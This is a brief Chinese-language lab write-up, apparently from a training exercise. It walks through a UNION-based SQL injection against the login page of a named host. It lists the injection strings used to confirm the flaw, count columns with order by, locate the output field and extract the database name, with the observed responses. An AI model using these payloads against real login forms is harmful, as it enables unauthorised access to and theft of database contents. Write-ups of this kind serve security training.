任务1------对http://yun.zhiliaotang.com:40008/login.html进行联合注入攻击
步骤如下:
1.判断注入点是否存在
步骤如下:
1.在用户名栏输入1' // 报数据库查询出错
2.在用户名栏输入1' or 1=1 -- // 正常登陆
3.在用户名栏输入1' or 1=2 -- // 出错
由此判断该处user参数为注入点
2.判断字段
步骤如下:
1.在用户名栏输入1' or 1=1 order by 1 -- //登陆成功
2.在用户名栏输入1' or 1=1 order by 2 -- //登陆成功
3.在用户名栏输入1' or 1=1 order by 3 -- //登陆成功
4.在用户名栏输入1' or 1=1 order by 4 -- //报数据库查询出错
由此判断字段数为3
3.判断输出位置
步骤如下:
1.在用户名栏输入1' union select 1,2,3 -- //页面输出一个二
由此判断输出位置为2
4.爆库名
步骤如下:
1.在用户名栏输入1' union select 1,database(),3 -- //输出数据库名为grade
*******************************************************************************
*******************************